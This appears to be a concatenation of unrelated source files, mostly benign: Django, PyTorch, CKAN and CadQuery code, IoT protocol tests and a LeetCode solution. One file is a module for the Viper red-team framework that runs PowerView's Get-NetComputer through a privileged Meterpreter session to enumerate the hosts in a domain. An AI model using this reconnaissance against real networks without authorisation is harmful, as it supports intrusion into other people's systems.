] | null | null | null | src/rest_framework_api_key/migrations/0001_initial.py | LundIT/djangorestframework-api-key | 20f4e539140020d88c872249c87a2704ca29e6e7 | [
"MIT"
] | null | null | null | src/rest_framework_api_key/migrations/0001_initial.py | LundIT/djangorestframework-api-key | 20f4e539140020d88c872249c87a2704ca29e6e7 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.14 on 2022-02-15 20:00
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='APIKey',
fields=[
('id', models.CharField(editable=False, max_length=100, primary_key=True, serialize=False, unique=True)),
('prefix', models.CharField(editable=False, max_length=8, unique=True)),
('hashed_key', models.CharField(editable=False, max_length=100)),
('created', models.DateTimeField(auto_now_add=True, db_index=True)),
('name', models.CharField(default=None, help_text='A free-form name for the API key. Need not be unique. 50 characters max.', max_length=50)),
('revoked', models.BooleanField(blank=True, default=False, help_text='If the API key is revoked, clients cannot use it anymore. (This cannot be undone.)')),
('expiry_date', models.DateTimeField(blank=True, help_text='Once API key expires, clients cannot use it anymore.', null=True, verbose_name='Expires')),
],
options={
'verbose_name': 'API key',
'verbose_name_plural': 'API keys',
'ordering': ('-created',),
'abstract': False,
},
),
]
| 42.393939 | 172 | 0.59614 |
4a258d518c0b6e791759d5df813e93f2b66f84ea | 7,222 | py | Python | racklay/model.py | AnuragSahu/RackLay | 8d32eae4642cbaaed57a5b33d1293a1b8d6bff1d | [
"MIT"
] | null | null | null | racklay/model.py | AnuragSahu/RackLay | 8d32eae4642cbaaed57a5b33d1293a1b8d6bff1d | [
"MIT"
] | null | null | null | racklay/model.py | AnuragSahu/RackLay | 8d32eae4642cbaaed57a5b33d1293a1b8d6bff1d | [
"MIT"
] | null | null | null | from collections import OrderedDict
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from .resnet_encoder import ResnetEncoder
# Utils
class ConvBlock(nn.Module):
"""Layer to perform a convolution followed by ELU
"""
def __init__(self, in_channels, out_channels):
super(ConvBlock, self).__init__()
self.conv = Conv3x3(in_channels, out_channels)
self.nonlin = nn.ELU(inplace=True)
def forward(self, x):
out = self.conv(x)
out = self.nonlin(out)
return out
class Conv3x3(nn.Module):
"""Layer to pad and convolve input
"""
def __init__(self, in_channels, out_channels, use_refl=True):
super(Conv3x3, self).__init__()
if use_refl:
self.pad = nn.ReflectionPad2d(1)
else:
self.pad = nn.ZeroPad2d(1)
self.conv = nn.Conv2d(int(in_channels), int(out_channels), 3)
def forward(self, x):
out = self.pad(x)
out = self.conv(out)
return out
def upsample(x):
"""Upsample input tensor by a factor of 2
"""
return F.interpolate(x, scale_factor=2, mode="nearest")
class Encoder(nn.Module):
""" Encodes the Image into low-dimensional feature representation
Attributes
----------
num_layers : int
Number of layers to use in the ResNet
img_ht : int
Height of the input RGB image
img_wt : int
Width of the input RGB image
pretrained : bool
Whether to initialize ResNet with pretrained ImageNet parameters
Methods
-------
forward(x, is_training):
Processes input image tensors into output feature tensors
"""
def __init__(self, num_layers, img_ht, img_wt, pretrained=True):
super(Encoder, self).__init__()
# opt.weights_init == "pretrained"))
self.resnet_encoder = ResnetEncoder(num_layers, pretrained)
num_ch_enc = self.resnet_encoder.num_ch_enc
# convolution to reduce depth and size of features before fc
self.conv1 = Conv3x3(num_ch_enc[-1], 128)
self.conv2 = Conv3x3(128, 256) # Make this 128x128 for old model
self.pool = nn.MaxPool2d(2)
def forward(self, x):
"""
Parameters
----------
x : torch.FloatTensor
Batch of Image tensors
| Shape: (batch_size, 3, img_height, img_width)
Returns
-------
x : torch.FloatTensor
Batch of low-dimensional image representations
| Shape: (batch_size, 128, img_height/128, img_width/128)
"""
batch_size, c, h, w = x.shape
x = self.resnet_encoder(x)[-1]
x = self.pool(self.conv1(x))
x = self.conv2(x)
#x = self.pool(x) # Uncomment for previous model
return x
class Decoder(nn.Module):
""" Encodes the Image into low-dimensional feature representation
Attributes
----------
num_ch_enc : list
channels used by the ResNet Encoder at different layers
Methods
-------
forward(x, ):
Processes input image features into output occupancy maps/layouts
"""
def __init__(self, num_ch_enc, num_out_ch, oct_map_size):
super(Decoder, self).__init__()
self.num_output_channels = num_out_ch
self.num_ch_enc = num_ch_enc
self.num_ch_dec = np.array([8, 16, 32, 64, 128, 256, 512]) # Remove 8 and 512 and change 6 to 4 and 128 to 256 to go back to previous (init) model.
self.oct_map_size = oct_map_size
self.pool = nn.MaxPool2d(2)
# decoder
self.convs = OrderedDict()
for i in range(6, -1, -1):
# upconv_0
num_ch_in = 256 if i == 6 else self.num_ch_dec[i + 1]
num_ch_out = self.num_ch_dec[i]
self.convs[("upconv", i, 0)] = nn.Conv2d(
num_ch_in, num_ch_out, 3, 1, 1)
self.convs[("norm", i, 0)] = nn.BatchNorm2d(num_ch_out)
self.convs[("relu", i, 0)] = nn.ReLU(True)
# upconv_1
self.convs[("upconv", i, 1)] = nn.Conv2d(
num_ch_out, num_ch_out, 3, 1, 1)
self.convs[("norm", i, 1)] = nn.BatchNorm2d(num_ch_out)
self.convs["topview"] = Conv3x3(
self.num_ch_dec[0], self.num_output_channels)
self.dropout = nn.Dropout3d(0.2)
self.decoder = nn.ModuleList(list(self.convs.values()))
def forward(self, x, is_training=True):
"""
Parameters
----------
x : torch.FloatTensor
Batch of encoded feature tensors
| Shape: (batch_size, 128, occ_map_size/2^5, occ_map_size/2^5)
is_training : bool
whether its training or testing phase
Returns
-------
x : torch.FloatTensor
Batch of output Layouts
| Shape: (batch_size, 2, occ_map_size, occ_map_size)
"""
for i in range(6, -1, -1):
#print("SIZE AT THE BEGINNING OF EACH DECODER STEP")
#print(x.shape)
x = self.convs[("upconv", i, 0)](x)
x = self.convs[("norm", i, 0)](x)
x = self.convs[("relu", i, 0)](x)
x = upsample(x)
x = self.convs[("upconv", i, 1)](x)
x = self.convs[("norm", i, 1)](x)
scale_left = self.oct_map_size//x.shape[3] # Making the decoder output size whatever we want (self.opt.occ_map_size)
for i in range(scale_left//2):
x = upsample(x)
x = self.pool(x)
if is_training:
x = self.convs["topview"](x)
else:
softmax = nn.Softmax2d()
x = softmax(self.convs["topview"](x))
return x
class Discriminator(nn.Module):
"""
A patch discriminator used to regularize the decoder
in order to produce layouts close to the true data distribution
"""
def __init__(self):
super(Discriminator, self).__init__()
self.main = nn.Sequential(
# input is (nc) x 64 x 64
nn.Conv2d(1, 8, 3, 2, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. (ndf) x 32 x 32
nn.Conv2d(8, 16, 3, 2, 1, 1, bias=False),
nn.BatchNorm2d(16),
nn.LeakyReLU(0.2, inplace=True),
# state size. (ndf*2) x 16 x 16
nn.Conv2d(16, 32, 3, 2, 1, 1, bias=False),
nn.BatchNorm2d(32),
nn.LeakyReLU(0.2, inplace=True),
# state size. (ndf*4) x 8 x 8
nn.Conv2d(32, 8, 3, 2, 1, 1, bias=False),
nn.BatchNorm2d(8),
nn.LeakyReLU(0.2, inplace=True),
# state size. (ndf*8) x 4 x 4
nn.Conv2d(8, 1, 3, 1, 1, bias=False),
nn.Sigmoid()
)
def forward(self, x):
"""
Parameters
----------
x : torch.FloatTensor
Batch of output Layouts
| Shape: (batch_size, 2, occ_map_size, occ_map_size)
Returns
-------
x : torch.FloatTensor
Patch output of the Discriminator
| Shape: (batch_size, 1, occ_map_size/16, occ_map_size/16)
"""
return self.main(x)
| 30.217573 | 155 | 0.562033 |
4a258d7486777bf0a079bd9763fe361fa766b0bb | 8,841 | py | Python | d7a/alp/test/command_factory.py | L-I-Am/pyd7a | 7e3dd6ff71c92df72570d6b852ca74cc5af50707 | [
"Apache-2.0"
] | 9 | 2016-05-12T20:11:30.000Z | 2020-08-18T05:46:15.000Z | d7a/alp/test/command_factory.py | L-I-Am/pyd7a | 7e3dd6ff71c92df72570d6b852ca74cc5af50707 | [
"Apache-2.0"
] | 2 | 2018-01-14T12:39:06.000Z | 2019-11-25T09:11:08.000Z | d7a/alp/test/command_factory.py | L-I-Am/pyd7a | 7e3dd6ff71c92df72570d6b852ca74cc5af50707 | [
"Apache-2.0"
] | 7 | 2016-09-06T11:08:15.000Z | 2020-10-27T10:29:24.000Z | #
# Copyright (c) 2015-2021 University of Antwerp, Aloxy NV.
#
# This file is part of pyd7a.
# See https://github.com/Sub-IoT/pyd7a for further info.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
import binascii
from d7a.alp.command import Command
from d7a.alp.interface import InterfaceType
from d7a.alp.operands.file import DataRequest, Data, FileIdOperand
from d7a.alp.operands.file_header import FileHeaderOperand
from d7a.alp.operands.offset import Offset
from d7a.alp.operands.interface_configuration import InterfaceConfiguration
from d7a.alp.operations.file_management import CreateNewFile
from d7a.alp.operations.forward import Forward
from d7a.alp.operations.requests import ReadFileData, ReadFileHeader
from d7a.alp.operations.responses import ReturnFileData
from d7a.alp.operations.write_operations import WriteFileData, WriteFileHeader
from d7a.alp.regular_action import RegularAction
from d7a.fs.file_header import FileHeader
from d7a.fs.file_permissions import FilePermissions
from d7a.fs.file_properties import FileProperties, ActionCondition, StorageClass
from d7a.sp.configuration import Configuration
class TestCommandFactory(unittest.TestCase):
def test_create_with_read_file_action(self):
c = Command.create_with_read_file_action(file_id=1, length=10)
self.assertEqual(len(c.actions), 1)
self.assertEqual(type(c.actions[0]), RegularAction)
self.assertEqual(type(c.actions[0].operation), ReadFileData)
self.assertEqual(type(c.actions[0].operand), DataRequest)
self.assertEqual(c.actions[0].operand.offset.id, 1)
self.assertEqual(c.actions[0].operand.offset.offset.value, 0)
self.assertEqual(c.actions[0].operand.length, 10)
def test_create_with_write_file_action(self):
data = [0, 1, 2, 3, 4, 5]
c = Command.create_with_write_file_action(file_id=1, data=data)
self.assertEqual(len(c.actions), 1)
self.assertEqual(type(c.actions[0]), RegularAction)
self.assertEqual(type(c.actions[0].operation), WriteFileData)
self.assertEqual(type(c.actions[0].operand), Data)
self.assertEqual(c.actions[0].operand.offset.id, 1)
self.assertEqual(c.actions[0].operand.offset.offset.value, 0)
self.assertEqual(c.actions[0].operand.length, 6)
self.assertEqual(c.actions[0].operand.data, data)
def test_create_with_return_file_data_action(self):
data = [ 1 ]
c = Command.create_with_return_file_data_action(file_id=0x40, data=data)
self.assertEqual(len(c.actions), 1)
self.assertEqual(type(c.actions[0]), RegularAction)
self.assertEqual(type(c.actions[0].operation), ReturnFileData)
self.assertEqual(type(c.actions[0].operand), Data)
self.assertEqual(c.actions[0].operand.offset.id, 0x40)
self.assertEqual(c.actions[0].operand.offset.offset.value, 0)
self.assertEqual(c.actions[0].operand.length, 1)
self.assertEqual(c.actions[0].operand.data, data)
def test_create_with_read_file_action_d7asp(self):
c = Command.create_with_read_file_action(file_id=1, length=10, interface_type=InterfaceType.D7ASP)
self.assertEqual(len(c.actions), 2)
self.assertEqual(type(c.actions[0]), RegularAction)
self.assertEqual(type(c.actions[0].operation), Forward)
self.assertEqual(type(c.actions[0].operand), InterfaceConfiguration)
self.assertEqual(c.actions[0].operand.interface_id.value, 0xD7)
self.assertEqual(type(c.actions[0].operand.interface_configuration), Configuration)
# TODO configuration properties
self.assertEqual(type(c.actions[1].operation), ReadFileData)
self.assertEqual(type(c.actions[1].operand), DataRequest)
self.assertEqual(type(c.actions[1]), RegularAction)
self.assertEqual(type(c.actions[1].operation), ReadFileData)
self.assertEqual(type(c.actions[1].operand), DataRequest)
self.assertEqual(c.actions[1].operand.offset.id, 1)
self.assertEqual(c.actions[1].operand.offset.offset.value, 0)
self.assertEqual(c.actions[1].operand.length, 10)
def test_create_with_write_file_action_d7asp(self):
data = [0, 1, 2, 3, 4, 5]
c = Command.create_with_write_file_action(file_id=1, data=data, interface_type=InterfaceType.D7ASP)
self.assertEqual(len(c.actions), 2)
self.assertEqual(type(c.actions[0]), RegularAction)
self.assertEqual(type(c.actions[0].operation), Forward)
self.assertEqual(type(c.actions[0].operand), InterfaceConfiguration)
self.assertEqual(c.actions[0].operand.interface_id.value, 0xD7)
self.assertEqual(type(c.actions[0].operand.interface_configuration), Configuration)
# TODO configuration properties
self.assertEqual(type(c.actions[1].operation), WriteFileData)
self.assertEqual(type(c.actions[1].operand), Data)
self.assertEqual(c.actions[1].operand.offset.id, 1)
self.assertEqual(c.actions[1].operand.offset.offset.value, 0)
self.assertEqual(c.actions[1].operand.length, 6)
self.assertEqual(c.actions[1].operand.data, data)
def test_create_with_return_file_data_action_d7asp(self):
data = [1]
c = Command.create_with_return_file_data_action(file_id=0x40, data=data, interface_type=InterfaceType.D7ASP)
self.assertEqual(len(c.actions), 2)
self.assertEqual(type(c.actions[0]), RegularAction)
self.assertEqual(type(c.actions[0].operation), Forward)
self.assertEqual(type(c.actions[0].operand), InterfaceConfiguration)
self.assertEqual(c.actions[0].operand.interface_id.value, 0xD7)
self.assertEqual(type(c.actions[0].operand.interface_configuration), Configuration)
self.assertEqual(type(c.actions[1]), RegularAction)
self.assertEqual(type(c.actions[1].operation), ReturnFileData)
self.assertEqual(type(c.actions[1].operand), Data)
self.assertEqual(c.actions[1].operand.offset.id, 0x40)
self.assertEqual(c.actions[1].operand.offset.offset.value, 0)
self.assertEqual(c.actions[1].operand.length, 1)
self.assertEqual(c.actions[1].operand.data, data)
def test_create_with_read_file_header(self):
c = Command.create_with_read_file_header(file_id=0x40)
self.assertEqual(len(c.actions), 1)
self.assertEqual(type(c.actions[0]), RegularAction)
self.assertEqual(type(c.actions[0].operation), ReadFileHeader)
self.assertEqual(type(c.actions[0].operand), FileIdOperand)
self.assertEqual(c.actions[0].operand.file_id, 0x40)
def test_create_with_write_file_header(self):
file_header = FileHeader(
permissions=FilePermissions(
executable=True,
encrypted=False,
user_readable=True,
user_writable=True,
user_executable=False,
guest_readable=True,
guest_executable=False,
guest_writable=False
),
properties=FileProperties(act_enabled=False, act_condition=ActionCondition.WRITE, storage_class=StorageClass.PERMANENT),
alp_command_file_id=0x41,
interface_file_id=0x42,
file_size=1,
allocated_size=1
)
c = Command.create_with_write_file_header(file_id=0x40, file_header=file_header)
self.assertEqual(len(c.actions), 1)
self.assertEqual(type(c.actions[0]), RegularAction)
self.assertEqual(type(c.actions[0].operation), WriteFileHeader)
self.assertEqual(type(c.actions[0].operand), FileHeaderOperand)
self.assertEqual(c.actions[0].operand.file_id, 0x40)
self.assertEqual(c.actions[0].operand.file_header, file_header)
def test_create_with_create_file(self):
file_header = FileHeader(
permissions=FilePermissions(
executable=True,
encrypted=False,
user_readable=True,
user_writable=True,
user_executable=False,
guest_readable=True,
guest_executable=False,
guest_writable=False
),
properties=FileProperties(act_enabled=False, act_condition=ActionCondition.WRITE, storage_class=StorageClass.PERMANENT),
alp_command_file_id=0x41,
interface_file_id=0x42,
file_size=1,
allocated_size=1
)
c = Command.create_with_create_new_file(file_id=0x40, file_header=file_header)
self.assertEqual(len(c.actions), 1)
self.assertEqual(type(c.actions[0]), RegularAction)
self.assertEqual(type(c.actions[0].operation), CreateNewFile)
self.assertEqual(type(c.actions[0].operand), FileHeaderOperand)
self.assertEqual(c.actions[0].operand.file_id, 0x40)
self.assertEqual(c.actions[0].operand.file_header, file_header) | 46.777778 | 126 | 0.754213 |
4a258d75fc92752f9834c8a470c11eacaea2800a | 339 | py | Python | backend/dating/admin.py | crowdbotics-apps/friendmates-31875 | 5018d878c2fd7b07f9fff24b02a704b4838b3e15 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/dating/admin.py | crowdbotics-apps/friendmates-31875 | 5018d878c2fd7b07f9fff24b02a704b4838b3e15 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/dating/admin.py | crowdbotics-apps/friendmates-31875 | 5018d878c2fd7b07f9fff24b02a704b4838b3e15 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | from django.contrib import admin
from .models import Setting, Profile, Inbox, Dislike, Match, UserPhoto, Like
admin.site.register(UserPhoto)
admin.site.register(Setting)
admin.site.register(Profile)
admin.site.register(Like)
admin.site.register(Dislike)
admin.site.register(Match)
admin.site.register(Inbox)
# Register your models here.
| 26.076923 | 76 | 0.80531 |
4a258e0d7f95c3b2d9cb0b4b45edfbf0e68eb0f6 | 1,050 | py | Python | code_week12_713_719/interleaving_string_hard.py | dylanlee101/leetcode | b059afdadb83d504e62afd1227107de0b59557af | [
"Apache-2.0"
] | null | null | null | code_week12_713_719/interleaving_string_hard.py | dylanlee101/leetcode | b059afdadb83d504e62afd1227107de0b59557af | [
"Apache-2.0"
] | null | null | null | code_week12_713_719/interleaving_string_hard.py | dylanlee101/leetcode | b059afdadb83d504e62afd1227107de0b59557af | [
"Apache-2.0"
] | null | null | null | '''
Given three strings s1, s2 and s3, verify whether s3 is formed by an interleaving of s1 and s2.
Example 1:
Input: s1 = "aabcc", s2 = "dbbca", s3 = "aadbbcbcac"
Output: true
Example 2:
Input: s1 = "aabcc", s2 = "dbbca", s3 = "aadbbbaccc"
Output: false
Source: LeetCode
Link: https://leetcode-cn.com/problems/interleaving-string
'''
class Solution:
def isInterleave(self, s1: str, s2: str, s3: str) -> bool:
m, n = len(s1), len(s2)
if m + n != len(s3):
return False
        # initialize dp, including the first row and the first column
        dp = [[False] * (n + 1) for _ in range(m + 1)]
        dp[0][0] = True
        for i in range(1, m + 1):  # initialize the first column
            dp[i][0] = dp[i - 1][0] and (s3[i - 1] == s1[i - 1])
        for i in range(1, n + 1):  # initialize the first row
            dp[0][i] = dp[0][i - 1] and (s3[i - 1] == s2[i - 1])
        # compute all remaining dp values
        for i in range(1, m + 1):
            for j in range(1, n + 1):
                # state-transition equation
dp[i][j] = (dp[i - 1][j] and (s3[i + j - 1] == s1[i - 1])) or (
dp[i][j - 1] and (s3[i + j - 1] == s2[j - 1]))
return dp[-1][-1]
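# Quick sanity check (illustrative, mirroring the examples above):
if __name__ == "__main__":
    s = Solution()
    assert s.isInterleave("aabcc", "dbbca", "aadbbcbcac")
    assert not s.isInterleave("aabcc", "dbbca", "aadbbbaccc")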
| 25 | 79 | 0.438095 |
4a2590d175faa793b0e6418ec12b11fd4414dc3b | 1,379 | py | Python | examples/FreeCAD/Ex019_Counter_Sunk_Holes.py | justbuchanan/cadquery | 7ac64a7280490d99d26f4f12a1ff590370d7e8ba | [
"Apache-2.0"
] | null | null | null | examples/FreeCAD/Ex019_Counter_Sunk_Holes.py | justbuchanan/cadquery | 7ac64a7280490d99d26f4f12a1ff590370d7e8ba | [
"Apache-2.0"
] | null | null | null | examples/FreeCAD/Ex019_Counter_Sunk_Holes.py | justbuchanan/cadquery | 7ac64a7280490d99d26f4f12a1ff590370d7e8ba | [
"Apache-2.0"
] | null | null | null | #File: Ex019_Counter_Sunk_Holes.py
#To use this example file, you need to first follow the "Using CadQuery From Inside FreeCAD"
#instructions here: https://github.com/dcowden/cadquery#installing----using-cadquery-from-inside-freecad
#You run this example by typing the following in the FreeCAD python console, making sure to change
#the path to this example, and the name of the example appropriately.
#import sys
#sys.path.append('/home/user/Downloads/cadquery/examples/FreeCAD')
#import Ex019_Counter_Sunk_Holes
#If you need to reload the part after making a change, you can use the following lines within the FreeCAD console.
#reload(Ex019_Counter_Sunk_Holes)
#You'll need to delete the original shape that was created, and the new shape should be named sequentially
# (Shape001, etc).
#You can also tie these blocks of code to macros, buttons, and keybindings in FreeCAD for quicker access.
#You can get more information on this example at
# http://parametricparts.com/docs/examples.html#an-extruded-prismatic-solid
import cadquery
import Part
#Create a plate with 4 counter-sunk holes in it
result = cadquery.Workplane(cadquery.Plane.XY()).box(4, 2, 0.5).faces(">Z").workplane() \
.rect(3.5, 1.5, forConstruction=True)\
.vertices().cskHole(0.125, 0.25, 82.0, depth=None)
#Boiler plate code to render our solid in FreeCAD's GUI
Part.show(result.toFreecad())
| 44.483871 | 114 | 0.774474 |
4a2591ebe14d89c02f28805a27a66e8d727400cd | 1,625 | py | Python | biobb_adapters/pycompss/biobb_chemistry/acpype/acpype_params_gmx.py | bioexcel/biobb_adapters | 45f32feac328cb05f28038b2b00a7416fcae3178 | [
"Apache-2.0"
] | null | null | null | biobb_adapters/pycompss/biobb_chemistry/acpype/acpype_params_gmx.py | bioexcel/biobb_adapters | 45f32feac328cb05f28038b2b00a7416fcae3178 | [
"Apache-2.0"
] | 4 | 2019-03-04T15:22:06.000Z | 2021-09-24T14:43:48.000Z | biobb_adapters/pycompss/biobb_chemistry/acpype/acpype_params_gmx.py | bioexcel/biobb_adapters | 45f32feac328cb05f28038b2b00a7416fcae3178 | [
"Apache-2.0"
] | 2 | 2020-09-08T05:26:23.000Z | 2022-03-28T07:09:20.000Z | # Python
import os
import sys
import traceback
# Pycompss
from pycompss.api.task import task
from pycompss.api.parameter import FILE_IN, FILE_OUT
# Adapters commons pycompss
from biobb_adapters.pycompss.biobb_commons import task_config
# Wrapped Biobb
from biobb_chemistry.acpype.acpype_params_gmx import AcpypeParamsGMX # Importing class instead of module to avoid name collision
task_time_out = int(os.environ.get('TASK_TIME_OUT', 0))
@task(input_path=FILE_IN, output_path_gro=FILE_OUT, output_path_itp=FILE_OUT, output_path_top=FILE_OUT,
on_failure="IGNORE", time_out=task_time_out)
def _acpypeparamsgmx(input_path, output_path_gro, output_path_itp, output_path_top, properties, **kwargs):
task_config.pop_pmi(os.environ)
try:
AcpypeParamsGMX(input_path=input_path, output_path_gro=output_path_gro, output_path_itp=output_path_itp, output_path_top=output_path_top, properties=properties, **kwargs).launch()
except Exception as e:
traceback.print_exc()
raise e
finally:
sys.stdout.flush()
sys.stderr.flush()
def acpype_params_gmx(input_path, output_path_gro, output_path_itp, output_path_top, properties=None, **kwargs):
if (output_path_gro is None or os.path.exists(output_path_gro)) and \
(output_path_itp is None or os.path.exists(output_path_itp)) and \
(output_path_top is None or os.path.exists(output_path_top)) and \
True:
print("WARN: Task AcpypeParamsGMX already executed.")
else:
_acpypeparamsgmx( input_path, output_path_gro, output_path_itp, output_path_top, properties, **kwargs) | 40.625 | 187 | 0.763077 |
4a259257865ba557a5e89dc34ab9c7f4f6fff407 | 3,330 | py | Python | ckanext/geoview/controllers/service_proxy.py | davidread/ckanext-geoview | ceefb65c89cd7449a84659ee8678ae122d68cd02 | [
"MIT"
] | 1 | 2018-05-03T14:03:40.000Z | 2018-05-03T14:03:40.000Z | ckanext/geoview/controllers/service_proxy.py | davidread/ckanext-geoview | ceefb65c89cd7449a84659ee8678ae122d68cd02 | [
"MIT"
] | null | null | null | ckanext/geoview/controllers/service_proxy.py | davidread/ckanext-geoview | ceefb65c89cd7449a84659ee8678ae122d68cd02 | [
"MIT"
] | null | null | null | from logging import getLogger
import urlparse
import requests
import ckan.logic as logic
import ckan.lib.base as base
log = getLogger(__name__)
MAX_FILE_SIZE = 3 * 1024 * 1024  # 3MB
CHUNK_SIZE = 512
def proxy_service(self, context, data_dict):
''' Chunked proxy for resources. To make sure that the file is not too
large, first, we try to get the content length from the headers.
If the headers to not contain a content length (if it is a chinked
response), we only transfer as long as the transferred data is less
than the maximum file size. '''
resource_id = data_dict['resource_id']
log.info('Proxify resource {id}'.format(id=resource_id))
resource = logic.get_action('resource_show')(context, {'id': resource_id})
url = resource['url']
parts = urlparse.urlsplit(url)
if not parts.scheme or not parts.netloc:
base.abort(409, detail='Invalid URL.')
try:
req = self._py_object.request
method = req.environ["REQUEST_METHOD"]
url = url.split('?')[0] # remove potential query and fragment
if method == "POST":
length = int(req.environ["CONTENT_LENGTH"])
headers = {"Content-Type": req.environ["CONTENT_TYPE"]}
body = req.body
r = requests.post(url, data=body, headers=headers, stream=True)
else:
r = requests.get(url, params=req.query_string, stream=True)
#log.info('Request: {req}'.format(req=r.request.url))
#log.info('Request Headers: {h}'.format(h=r.request.headers))
        cl = r.headers.get('content-length')
if cl and int(cl) > MAX_FILE_SIZE:
base.abort(409, ('''Content is too large to be proxied. Allowed
file size: {allowed}, Content-Length: {actual}. Url: '''+url).format(
allowed=MAX_FILE_SIZE, actual=cl))
base.response.content_type = r.headers['content-type']
base.response.charset = r.encoding
length = 0
for chunk in r.iter_content(chunk_size=CHUNK_SIZE):
base.response.body_file.write(chunk)
length += len(chunk)
if length >= MAX_FILE_SIZE:
base.abort(409, ('''Content is too large to be proxied. Allowed
file size: {allowed}, Content-Length: {actual}. Url: '''+url).format(
allowed=MAX_FILE_SIZE, actual=length))
except requests.exceptions.HTTPError, error:
details = 'Could not proxy resource. Server responded with %s %s' % (
error.response.status_code, error.response.reason)
base.abort(409, detail=details)
except requests.exceptions.ConnectionError, error:
details = '''Could not proxy resource because a
connection error occurred. %s''' % error
base.abort(502, detail=details)
except requests.exceptions.Timeout, error:
details = 'Could not proxy resource because the connection timed out.'
base.abort(504, detail=details)
class ServiceProxyController(base.BaseController):
def proxy_service(self, resource_id):
data_dict = {'resource_id': resource_id}
context = {'model': base.model, 'session': base.model.Session,
'user': base.c.user or base.c.author}
return proxy_service(self, context, data_dict)
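# Illustrative sketch of the size-capped streaming pattern used above, outside
# of CKAN (the url and error handling are hypothetical):
#   total = 0
#   for chunk in requests.get(url, stream=True).iter_content(CHUNK_SIZE):
#       total += len(chunk)
#       if total >= MAX_FILE_SIZE:
#           raise ValueError('response too large to proxy')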
| 39.642857 | 85 | 0.63964 |
4a2592a8c730e8afdb0936dee405f06d5b948c4a | 2,265 | py | Python | MODULES/Discovery_RemoteSystemDiscovery_GetNetComputer.py | FunnyWolf/viperpython | ba794ee74079285be32191e898daa3e56305c8be | [
"BSD-3-Clause"
] | 42 | 2021-01-20T15:30:33.000Z | 2022-03-31T07:51:11.000Z | MODULES/Discovery_RemoteSystemDiscovery_GetNetComputer.py | FunnyWolf/viperpython | ba794ee74079285be32191e898daa3e56305c8be | [
"BSD-3-Clause"
] | 2 | 2021-08-17T00:16:33.000Z | 2022-02-21T11:37:45.000Z | MODULES/Discovery_RemoteSystemDiscovery_GetNetComputer.py | FunnyWolf/viperpython | ba794ee74079285be32191e898daa3e56305c8be | [
"BSD-3-Clause"
] | 28 | 2021-01-22T05:06:39.000Z | 2022-03-31T03:27:42.000Z | # -*- coding: utf-8 -*-
# @File : SimplePostPowershellModule.py
# @Date : 2019/1/12
# @Desc :
from Lib.ModuleAPI import *
class PostModule(PostMSFPowershellFunctionModule):
NAME_ZH = "获取域内主机名"
DESC_ZH = "模块获取主机所在域的所有域主机名,如果主机不在域中,脚本可能报错."
NAME_EN = "Get the hostname in the domain"
DESC_EN = "The module obtains all domain host names of the domain where the host is located.\n" \
"If the host is not in the domain, the script may report an error."
MODULETYPE = TAG2TYPE.Discovery
PLATFORM = ["Windows"] # 平台
PERMISSIONS = ["Administrator", "SYSTEM", ] # 所需权限
ATTCK = ["T1018"] # ATTCK向量
README = ["https://www.yuque.com/vipersec/module/ivaxm9"]
REFERENCES = ["https://attack.mitre.org/techniques/T1018/"]
AUTHOR = "Viper"
def __init__(self, sessionid, ipaddress, custom_param):
super().__init__(sessionid, ipaddress, custom_param)
self.set_script("PowerView.ps1") # 设置目标机执行的脚本文件
self.set_execute_string('Get-NetComputer')
def check(self):
"""执行前的检查函数"""
session = Session(self._sessionid)
if session.is_in_domain:
self.set_execute_string('Get-NetComputer')
return True, None
else:
return False, "此模块只支持Windows的Meterpreter,且session所属用户必须在域中", "This module only supports Meterpreter of Windows, and the user of the session must be in the domain"
def callback(self, status, message, data):
if status:
powershell_json_output = data.split("\n")
if isinstance(powershell_json_output, list) and len(powershell_json_output) > 0:
try:
for one in powershell_json_output:
if one is None or len(one) == 0:
continue
else:
self.log_good(f"主机名: {one}", f"Hostname: {one}")
except Exception as E:
pass
else:
self.log_error("脚本无有效输出", "Script has no valid output")
self.log_error(powershell_json_output, powershell_json_output)
else:
self.log_error("模块执行失败", "Module execution failed")
self.log_error(message, message)
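# A minimal, self-contained sketch of the parsing step in callback() above,
# assuming the PowerShell output is newline-delimited hostnames (the sample
# data is invented for illustration):
#
#     sample_output = "DC01\nFILESRV02\n\nWORKSTATION03\n"
#     hostnames = [line for line in sample_output.split("\n") if line]
#     # -> ['DC01', 'FILESRV02', 'WORKSTATION03']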
| 38.389831 | 174 | 0.606623 |
4a2592c25d233040e3bbdc883b2ac12fd61a4702 | 10,131 | py | Python | engine/common/common_request_process.py | datapunk2078/torro_community | 97a97c9d089b0a7b47ccdc28e4e077da36d4b85c | [
"MIT"
] | null | null | null | engine/common/common_request_process.py | datapunk2078/torro_community | 97a97c9d089b0a7b47ccdc28e4e077da36d4b85c | [
"MIT"
] | null | null | null | engine/common/common_request_process.py | datapunk2078/torro_community | 97a97c9d089b0a7b47ccdc28e4e077da36d4b85c | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: UTF-8 -*
"""
@author:li-boss
@file_name: common_request_process.py
@create date: 2019-10-27 14:08
@blog https://leezhonglin.github.io
@csdn https://blog.csdn.net/qq_33196814
@file_description:请求处理
"""
import json
from json import JSONDecodeError
from common.common_api_version import apiVersion
from common.common_response_code import response_code
from common.common_response_log import ResponseLog
from common.common_response_process import response_result_process
from utils.log_helper import lg
from utils.xml_json_process import xml_to_json, is_none
from flask import g
class requestProcess(object):
"""
Request processing
"""
def get_user_key(self):
try:
user_key = g.user_key
except:
user_key = 1
return user_key
def get_user_account_id(self):
try:
user_key = g.user_key
# # print(user_key)
account_id = g.account_id
except:
account_id = 'TorroAdmin'
return account_id
def get_workspace_id(self):
try:
user_key = g.user_key
# # print(user_key)
workspace_id = g.workspace_id
except:
workspace_id = 362
return workspace_id
def _xml_request(self, request, model_json=None):
"""
